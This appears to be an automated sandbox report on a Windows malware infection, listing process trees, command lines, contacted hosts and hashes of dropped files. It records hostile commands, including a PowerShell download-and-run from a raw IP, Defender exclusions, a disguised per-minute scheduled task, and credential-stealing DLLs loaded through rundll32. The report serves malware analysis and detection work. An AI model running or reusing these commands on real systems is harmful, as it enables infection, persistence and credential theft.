PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 1408 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 1408 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 1408 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 1408 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2204 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe
PID 2204 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe
PID 2204 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe
PID 2204 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe
PID 876 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

Processes

C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe

"C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\67E7.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

"C:\Users\Admin\AppData\Local\Temp\7DA9.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

"C:\Users\Admin\AppData\Local\Temp\7DA9.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe"

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1444

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe"

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {303F32D4-477B-4968-ABCA-175CE614C246} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\8410.exe

C:\Users\Admin\AppData\Local\Temp\8410.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 124

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\93AB.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\BE25.exe

C:\Users\Admin\AppData\Local\Temp\BE25.exe

C:\Users\Admin\AppData\Local\Temp\2C15.exe

C:\Users\Admin\AppData\Local\Temp\2C15.exe

C:\Users\Admin\AppData\Local\Temp\31C0.exe

C:\Users\Admin\AppData\Local\Temp\31C0.exe

C:\Users\Admin\AppData\Local\Temp\3BCF.exe

C:\Users\Admin\AppData\Local\Temp\3BCF.exe

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\452737119395_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\cfdfjwb

C:\Users\Admin\AppData\Roaming\cfdfjwb

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
ET 196.188.169.138:80 sdfjhuz.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
PL 79.96.138.166:443 sportessentia.home.pl tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
US 172.67.139.220:443 api.2ip.ua tcp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
ET 196.188.169.138:80 sdfjhuz.com tcp
US 8.8.8.8:53 sajdfue.com udp
KR 211.181.24.132:80 sajdfue.com tcp
KR 211.181.24.132:80 sajdfue.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
DE 5.75.208.156:80 5.75.208.156 tcp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
ID 103.147.154.49:443 tcp
US 8.8.8.8:53 udp
BR 45.152.46.72:443 streamingplay.site tcp
BR 45.152.46.72:443 streamingplay.site tcp
US 8.8.8.8:53 www.upload.ee udp
FR 51.91.30.159:443 www.upload.ee tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
RU 185.215.113.45:80 185.215.113.45 tcp
US 8.8.8.8:53 topgamecheats.dev udp
BG 93.123.39.96:443 topgamecheats.dev tcp
NL 193.222.96.225:80 193.222.96.225 tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
US 8.8.8.8:53 udp
N/A 192.185.16.114:443 tcp
N/A 192.185.16.114:443 tcp
US 8.8.8.8:53 udp
N/A 209.141.39.59:443 tcp
US 8.8.8.8:53 udp
GB 172.217.169.78:443 tcp
N/A 195.20.16.82:443 tcp
N/A 195.20.16.82:443 tcp
US 8.8.8.8:53 udp
ID 103.147.154.49:443 tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp

Files

memory/1940-1-0x00000000008D0000-0x00000000009D0000-memory.dmp

memory/1940-3-0x0000000000400000-0x000000000071E000-memory.dmp

memory/1940-2-0x0000000000220000-0x000000000022B000-memory.dmp

memory/1940-5-0x0000000000400000-0x000000000071E000-memory.dmp

memory/1200-4-0x00000000025A0000-0x00000000025B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67E7.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 f772938618715239d925c7b7943c5582
SHA1 0312bdaca177849dea6df975a70e768ee56cccf4
SHA256 a2c5938f8e1aeebff52a3077b1bf3ddb8666ea539886846fb64db6c012c8cd33
SHA512 6a259c1ced90aded5dc99173831cff6314287af90e9181cbc701221f93f2407714e991ee3881c4e79409081179c1a53e67e5a756f793bfd40fa9f76693a31213

memory/2564-26-0x0000000000220000-0x00000000002B2000-memory.dmp

memory/2748-29-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2564-34-0x0000000000220000-0x00000000002B2000-memory.dmp

memory/2748-36-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2748-37-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2564-35-0x0000000001D50000-0x0000000001E6B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 cae1a38eaef596f61c516089397e374a
SHA1 d1bfb3e3f25040b9cc99615d86119557d92a84db
SHA256 e1f18f12e4293cb004e82acf79c6abf1bc169ad1f31c349746cd8a9e20e274c2
SHA512 cb42b799980539a4976459b401187d115f5a6b044440531c32e811b8a654e270a27e0ecd5a034b55be2210c3484c7ac8e9f246fdcc36b616eb8c9efee8b1fdcd

memory/2748-31-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc\7DA9.exe

MD5 d9eea74d223b8c1e19b326688518567d
SHA1 7d53772f2744fb85ad843c3d68fa33268c4a624b
SHA256 f6a60e0058b467b2efd5322c80101b63002ec8de41bc0a8694ed9709c39bb936
SHA512 b0c690b4a6fbc5cc19568a32f84cbe4f5e6b777cf6c79f18f150cd43d94e3c8dda904f016723b68511131268e0ae8fec59a601a8c741641dd58c2bd5c10538a9

\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 de3d52b77c63c7b3fdc9e558effbd4af
SHA1 6f92f2c1115bca65f25ea9af3921699d97f72128
SHA256 05a6a2218409af6a0f6091fa3c43d878597c1d078cad8d867d2c36dd9627e10e
SHA512 e91f6b1c4a223c44cfeb480518089bc3a959101aefa8c56c06adee0b33a5243b56bde781aaa1f1b1db31c9aca704a85e9bca3ee77f3667ddba3e928a2916f3d0

memory/2748-58-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 5b77b7dbd20a112a5b598da8805d6735
SHA1 9c05f1a83c8398547149e197f0f8672ea687c719
SHA256 76d83b1c5b7359198d0cc911bf70ede65f56620ae30b95fc2a4c6c017be16b98
SHA512 397f8b3f4d7c6ffcc95d3296395515a84258806e6442b4bdab42c0a46175a87e70a5b2ca7593519b38922da4828a0a97072a986d1f0a75c54d617c8adcdff8f2

\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 641d7f78c964f9f64142494f4ba216a6
SHA1 561aef41e50d805e8d90e2280cf061eadf9b30b3
SHA256 23bb97253aa4a11ea21ba693aebee39fcf8936e1ed85a59217c5779a1d314245
SHA512 6e2d805ac3bcd2e69788686380e131085387c1231d9b5783bcf3c9d2ffd0ec0a75d849efa9ad582ddff204c999c3069ee4ba99b75cec9794b77832b4464aac19

memory/2684-60-0x00000000002F0000-0x0000000000382000-memory.dmp

\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 888dba3eb73cebb3e00be574e3144939
SHA1 e894bb88de481dcfc825ef5b50a67359e55e580e
SHA256 9c3865fc42fbbdee0c3d0737ffe90fbe6124ddcb923058e4477d23c36791d842
SHA512 5eaa429ead18d080020b5922b4d0ac9e42f37645858211e7ed9d22f85c1dfa24dd9b9d2c78a90f2511951c0c7aa43909464dd1f0a3be4b70af7d13f76b9790b6

memory/2684-68-0x00000000002F0000-0x0000000000382000-memory.dmp

memory/2204-70-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-69-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 7f3a7543ba3f646faefdfa53e992f0f5
SHA1 16c64a6aa1f9fe4241ef45c5b18cdb0f2defd52f
SHA256 0dbed298832d877424aa20f1c02f84b970e70175b53cca062aa378dac799d365
SHA512 ae3f9d7ea889d8da4751783a1b628d3822a3ade17e0b8dabf2fd9ad913758da67b45d4c9543cb0208776df97f06ab260231b6b66a09d1cc719ca3b479d8e0df2

memory/2684-61-0x00000000002F0000-0x0000000000382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab92AE.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b41fc6f54520417703e9d78eeb8b6c7b
SHA1 11aa1fa43a92b0d3944d70b21b1078cfaf64a1ac
SHA256 3ba37b3a7914cb8f93d5d4a90ed0967f7e982d00c2b1cc3f274e59594ba89986
SHA512 ca3598daddbd69001fb006e14bb82f879f33cdfb38cf4502553db3e1c11cfdff8d62755d13f49aeeac360a3354d7cb65f6fcf8bc40fb71c5d0caa410523ab4c5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 25199c60dcdc7972a2d352c99cce3685
SHA1 75af0af164ad2b16e7ba0f1ae60b4693dcfed0f5
SHA256 52accd23d7d0dbfc5a4babf518a0cc1683222b8d263409db1e0da6bc10e24745
SHA512 fd84637af78de62ca78e5aa1cc63b54e7380728a0b710cd911524e766d3e1f7fc54b6e02de6bea08a54203bbc1090065ea5937c71780363cacf267aacf662c33

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d67fa48cf6cf5f1818b732ea24db1d6e
SHA1 44858909775b98c384307149a53b231f084427f6
SHA256 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27
SHA512 c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 bf6d1d1725a23dcff97c3f8acc82db92
SHA1 beb5b513f2ec01fb21438af59c4336ed34259532
SHA256 7c864c384fc9097c02b931fb4821219781444047217074de800469d4fdf4d7c7
SHA512 cde72cfdae79a1e566741856fbedc6126d9e10731ac894624d5e540d6dba19c6e7f53bb35416d101f51ffcd835f47a8a95528a0d80439c71a77cc9b7cbda4c86

memory/2204-84-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-83-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-91-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-90-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-88-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 4e462b81647b8453ef9333923a1d5c6e
SHA1 7e2b0bf2cfa009c834b4d65762d72f10f4f46cda
SHA256 7966cb5c8492ba3e2d928a4bf22c22ac5c18fc8cdcf49a24fd978421a89aac23
SHA512 78e6b7b95ace3af77a003cf6c2fe6d59923597c2d4f95ec384692e1917ceb024e7c43530d4b6b73dec2e2288c08652000b2269eccdab69677b93f249e60af50e

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 07dbdb1159e2d3194d4d1fdbdfbd70a4
SHA1 d2045cf8120cc0398480fde884f90661eebeb402
SHA256 b608217134cdf3c0eaf17beb1056f91ea570712031e9a3bc3e4bda215f92a658
SHA512 3e0e326b6c77e5d87031c5ff07c593d37e84d6395e47d97d1efcf0458e59491686e7fbb790dfc6250d132ac35070550ea4e0c176d75e2eebc26a2a9446c8e8b2

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 adf12397a33e4db95a4915c32dd7b50f
SHA1 cef0e7bcbf6eb34430db2980ed6a6a5083338abe
SHA256 4cd220ed31a2d01fc233e2c9fdecb3cb71e84a964f35b4a391b2846bdfe2ef1c
SHA512 089497c137c7ad9fddf0ea6949ff173548c5d1549e8f7d2455075855347ae54991b81b03970c66837eabf67c62ea5d391f80c917ce6682d32129dfade476e2dc

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 0878b0bec8b7515b064c1a28b2984a28
SHA1 f2d7876c21e444fed9c9b10a3aa1d0be436763d9
SHA256 c18b0333139e1f4dd15f4d5f253ed08c6bd43e5bd2d52d425a1a7cc08714390a
SHA512 1c8479f351560705b09593a86601179b2d8ded1a9b46bf60e866176d65bdef77d321d815ec60b3f481710d8d93b436b139af1bb31466cc2c143e4ed823cb9551

memory/1408-105-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 22451f90d55f6a6e95fa91bfb832dd4c
SHA1 403071b6198f9620d095600142497e77801ae33a
SHA256 511160abdccc9c9c4105d66c2e8181c5610a352785befa1f4d7ce765323c71ad
SHA512 ccaa02d26087492d8dd7c81bd93c5907b16b94aac2dcbbff4770ee4b0ae5b79b9083803ba1f976deec5939041a6d0ee73d9fd30ec0754ad7d4b9d0258547362c

memory/2544-110-0x00000000007A0000-0x00000000008A0000-memory.dmp

memory/1408-112-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2204-113-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1408-114-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2544-111-0x00000000002B0000-0x00000000002E1000-memory.dmp

memory/1408-107-0x0000000000400000-0x0000000000644000-memory.dmp

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 5a01802387dc6601d14c72e7abc06496
SHA1 7950375263ed7acaa89ed0e5454950307f0c128b
SHA256 e0cc16355942b00537f7b4ce2570c9a749628466ac2ad17bc635af16018f54db
SHA512 67c96ac953fb54a5d6fb46679eed10ddf2ec8cb724b3eec602f09fbfc9d913c17f8b258d12fbf9cb241d9f3d774089936315d38e523fd65c5bab5fff769e2a56

C:\Users\Admin\AppData\Local\Temp\TarA851.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarA951.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 f15bcc17ed2ca868c8a12de5fe15d202
SHA1 f3204ef68a365b3e7ed652ba57c3635a4ad986f2
SHA256 58432e52a5421ff02090c881e00f5acb785a326dcc3295413bddc41cd2ff7c88
SHA512 03d72c912f495a4a12c023af0a6ec55e2286209e9b4edd38235b30739aec01fed3d5cedd38a20d59fbf39f58dd46a0eb8b1388636d098a0cc0a75f380acacc53

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 2e8359e8c463da40da01b2a5a294d907
SHA1 052c54a09e8bc8471f49db6d4963d9f90cccd98b
SHA256 5b878a3ef3cdc8dd2df831f63bc0a9478760afdb1abc215b9466dfbaa62c5b59
SHA512 5a7f915a5f549734a4156cd42115a887b529843fe6cbb851e97190b825813db83a8dd244d4e83581e7851012235a657d22a9e41924204948a8503187c152c5c1

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 182dc2ca1de5d699663cacd788a387eb
SHA1 48b64feb432715cea9c8919691e98e0911e36f1b
SHA256 5c82e4af3350bf40742da1ad4b421d0dc13d6c0acd7ddb511bcb0b53e44c4829
SHA512 7191bebab7ec72e5f4a2adf26a375d8ff8d908504ef83bfecc358fa8bc753ad66b795f36db7d898247fca146d6cdd102a6125a927250573fdb3f583adce37108

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 47704f454af8641dac1af2e2768d7881
SHA1 e3341bfdec84f69684aecde18cab2864519c7728
SHA256 a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64
SHA512 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25

memory/1408-172-0x0000000000400000-0x0000000000644000-memory.dmp

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/2204-183-0x0000000000400000-0x0000000000537000-memory.dmp

memory/876-188-0x0000000000950000-0x0000000000A50000-memory.dmp

memory/1944-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/876-190-0x0000000000220000-0x0000000000224000-memory.dmp

memory/1944-191-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1944-194-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1944-196-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 d35c806c95b926208b06f305860de044
SHA1 fd111b2072749c0e2b3f1bb7102e4fbcdd8b931b
SHA256 722325dfc7e0a3d8b9c5bcf978e54f9a90a83ffa5d14372a51dc7c3609fee061
SHA512 cb5f66f83bd6a8ddad6d740479d17352d3a8249ab6fec7ea0ee071dcc7f9855ed378dee61bb65e92d272e3fb8187282ce08d0694550cfa610bf6e6508ec5b6a6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 61350605145dd6149d79e76ebd1b0b58
SHA1 09f00ea3c06247143eb128f5bc6df2745a374c56
SHA256 4c5532c75e2dcd198ca6607cfe6a3bafb74b808a48eadbbd6170b2c271e00d1f
SHA512 7f25782d415093b0fe6f089423d413e6c6c1fa855a3dac6c28c4819b11444c81317d61eba6654b1e6f7bb6108273bfdca0026ded938a8b253082dc15945b981c

C:\Users\Admin\AppData\Local\Temp\8410.exe

